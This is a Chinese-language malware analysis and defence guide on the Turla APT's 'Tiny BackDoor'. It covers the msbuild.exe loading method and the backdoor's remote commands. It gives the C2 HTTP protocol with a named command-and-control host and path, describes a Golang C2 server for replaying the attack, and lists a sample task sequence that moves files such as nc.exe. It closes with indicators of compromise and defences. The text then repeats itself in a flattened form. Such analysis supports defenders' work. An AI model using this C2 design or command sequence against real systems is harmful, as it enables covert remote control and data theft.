Turla组织最新Tiny BackDoor后门通信模型剖析及攻击场景复现
字数 1549 2025-08-25 22:59:15

Turla组织Tiny BackDoor后门技术分析与防御指南

1. 概述

Turla组织(又称Snake、Uroburos)是一个具有国家背景的高级持续性威胁(APT)组织,主要针对政府机构、外交部门和军事组织进行网络间谍活动。近期发现该组织使用了一款名为"Tiny BackDoor"的新型后门程序,具有隐蔽性强、功能完善的特点。

本技术文档将详细分析该后门的:

  • 技术实现细节
  • 通信模型
  • 攻击场景复现方法
  • 检测与防御方案

2. 后门技术分析

2.1 加载方式

Tiny BackDoor采用MSBuild项目文件形式进行加载,利用合法系统工具实现无文件攻击:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 后门文件

隐蔽技术:

  • 创建线程隐藏MSBuild.exe窗口
  • 使用系统合法进程作为载体
  • 无文件驻留技术

2.2 功能模块

2.2.1 信息收集

后门首先收集以下主机信息并Base64编码:

  • 当前用户所属域名(本地账户则获取计算机名)
  • 当前用户名
  • 当前进程ID

2.2.2 远控指令

支持7种远控指令:

指令 功能描述
shell 使用cmd执行shell命令
sleep 修改心跳间隔时间(默认1分钟)
upload 上传文件到C&C服务器
download 从C&C服务器下载文件
cd 修改当前工作目录路径
pwd 显示当前工作目录路径
ps 使用PowerShell执行命令

2.2.3 通信加密

采用复合加密方案:

  1. Gzip压缩数据
  2. Base64编码处理
  3. 通过HTTPS传输

2.3 通信模型分析

2.3.1 心跳通信

请求1:

POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=c&id=<Base64编码的主机信息>
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: 0

响应1:

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
<Base64编码的Gzip压缩指令>

2.3.2 指令执行

请求2:

POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=c&id=<主机信息>
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: <长度>
<Base64编码的Gzip压缩执行结果>

响应2:

HTTP/1.0 200 OK
Content-Length: 0

2.3.3 文件下载

请求3:

POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=f&id=<主机信息>&n=文件名
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: <长度>
<Base64编码的Gzip压缩文件内容>

2.3.4 文件上传

GET请求:

GET /advprod03/assets/plugin/tinymce/docs/php/index.php?m=f&id=<主机信息>&n=文件名
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph

响应:

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
<Base64编码的Gzip压缩文件内容>

3. 攻击场景复现

3.1 环境搭建

3.1.1 C&C服务器搭建(使用Golang)

代码结构:

├── common.go    // 通用函数(编解码、文件操作)
├── main.go      // 主程序入口
├── web.go       // 请求处理逻辑
└── conf/
    ├── tasks2.txt   // 预定义指令序列
    └── tmp2.txt     // 指令执行状态

关键功能实现:

  • Base64编解码
  • Gzip压缩解压
  • 文件读写操作
  • HTTP请求处理

3.1.2 指令序列配置(tasks2.txt)

示例指令序列:

[<pwd>]
[<cd>][{C:\\Users\\admin}]
[<pwd>]
[<shell>][{ipconfig}]
[<ps>][{dir}]
[<download>][{C:\\Users\\admin\\Desktop\\nc.exe}]
[<upload>][{C:\\Users\\admin\\Desktop\\123.exe}]

3.2 攻击流程演示

  1. 后门启动:通过msbuild.exe加载后门
  2. 初始连接:后门发送主机信息建立会话
  3. 指令下发:C&C服务器按tasks2.txt顺序发送指令
  4. 指令执行
    • 执行系统命令(ipconfig, dir等)
    • 切换工作目录
    • 文件上传下载
  5. 结果回传:执行结果加密后回传服务器

4. 检测与防御方案

4.1 检测指标(IOC)

网络特征:

  • 请求URL包含路径:/advprod03/assets/plugin/tinymce/docs/php/index.php
  • 参数包含:m=cm=f
  • 通信数据采用Base64+Gzip编码

主机特征:

  • MSBuild.exe异常网络连接
  • 异常进程树:msbuild.exe作为父进程
  • 注册表中异常MSBuild项目

4.2 防御措施

  1. 应用控制

    • 限制msbuild.exe网络访问
    • 实施白名单机制,控制MSBuild项目执行

  2. 网络监控

    • 监控异常Base64编码的HTTP流量
    • 检测对已知C&C域名的访问

  3. 系统加固

    • 禁用不必要的.NET框架功能
    • 定期审计MSBuild项目文件

  4. 终端防护

    • 部署EDR解决方案监控进程行为
    • 启用内存保护机制

5. 总结

Turla组织的Tiny BackDoor后门展示了高级威胁组织的技术特点:

  • 利用合法系统工具实现隐蔽加载
  • 完善的远控功能设计
  • 复杂的通信加密方案
  • 针对性的攻击目标选择

防御此类威胁需要采取纵深防御策略,结合网络流量分析、终端行为监控和系统加固等多层次防护措施。

Turla组织Tiny BackDoor后门技术分析与防御指南 1. 概述 Turla组织(又称Snake、Uroburos)是一个具有国家背景的高级持续性威胁(APT)组织,主要针对政府机构、外交部门和军事组织进行网络间谍活动。近期发现该组织使用了一款名为"Tiny BackDoor"的新型后门程序,具有隐蔽性强、功能完善的特点。 本技术文档将详细分析该后门的: 技术实现细节 通信模型 攻击场景复现方法 检测与防御方案 2. 后门技术分析 2.1 加载方式 Tiny BackDoor采用MSBuild项目文件形式进行加载,利用合法系统工具实现无文件攻击: 隐蔽技术: 创建线程隐藏MSBuild.exe窗口 使用系统合法进程作为载体 无文件驻留技术 2.2 功能模块 2.2.1 信息收集 后门首先收集以下主机信息并Base64编码: 当前用户所属域名(本地账户则获取计算机名) 当前用户名 当前进程ID 2.2.2 远控指令 支持7种远控指令: | 指令 | 功能描述 | |------|----------| | shell | 使用cmd执行shell命令 | | sleep | 修改心跳间隔时间(默认1分钟) | | upload | 上传文件到C&C服务器 | | download | 从C&C服务器下载文件 | | cd | 修改当前工作目录路径 | | pwd | 显示当前工作目录路径 | | ps | 使用PowerShell执行命令 | 2.2.3 通信加密 采用复合加密方案: Gzip压缩数据 Base64编码处理 通过HTTPS传输 2.3 通信模型分析 2.3.1 心跳通信 请求1: 响应1: 2.3.2 指令执行 请求2: 响应2: 2.3.3 文件下载 请求3: 2.3.4 文件上传 GET请求: 响应: 3. 攻击场景复现 3.1 环境搭建 3.1.1 C&C服务器搭建(使用Golang) 代码结构: 关键功能实现: Base64编解码 Gzip压缩解压 文件读写操作 HTTP请求处理 3.1.2 指令序列配置(tasks2.txt) 示例指令序列: 3.2 攻击流程演示 后门启动 :通过msbuild.exe加载后门 初始连接 :后门发送主机信息建立会话 指令下发 :C&C服务器按tasks2.txt顺序发送指令 指令执行 : 执行系统命令(ipconfig, dir等) 切换工作目录 文件上传下载 结果回传 :执行结果加密后回传服务器 4. 检测与防御方案 4.1 检测指标(IOC) 网络特征: 请求URL包含路径: /advprod03/assets/plugin/tinymce/docs/php/index.php 参数包含: m=c 或 m=f 通信数据采用Base64+Gzip编码 主机特征: MSBuild.exe异常网络连接 异常进程树:msbuild.exe作为父进程 注册表中异常MSBuild项目 4.2 防御措施 应用控制 : 限制msbuild.exe网络访问 实施白名单机制,控制MSBuild项目执行 网络监控 : 监控异常Base64编码的HTTP流量 检测对已知C&C域名的访问 系统加固 : 禁用不必要的.NET框架功能 定期审计MSBuild项目文件 终端防护 : 部署EDR解决方案监控进程行为 启用内存保护机制 5. 总结 Turla组织的Tiny BackDoor后门展示了高级威胁组织的技术特点: 利用合法系统工具实现隐蔽加载 完善的远控功能设计 复杂的通信加密方案 针对性的攻击目标选择 防御此类威胁需要采取纵深防御策略,结合网络流量分析、终端行为监控和系统加固等多层次防护措施。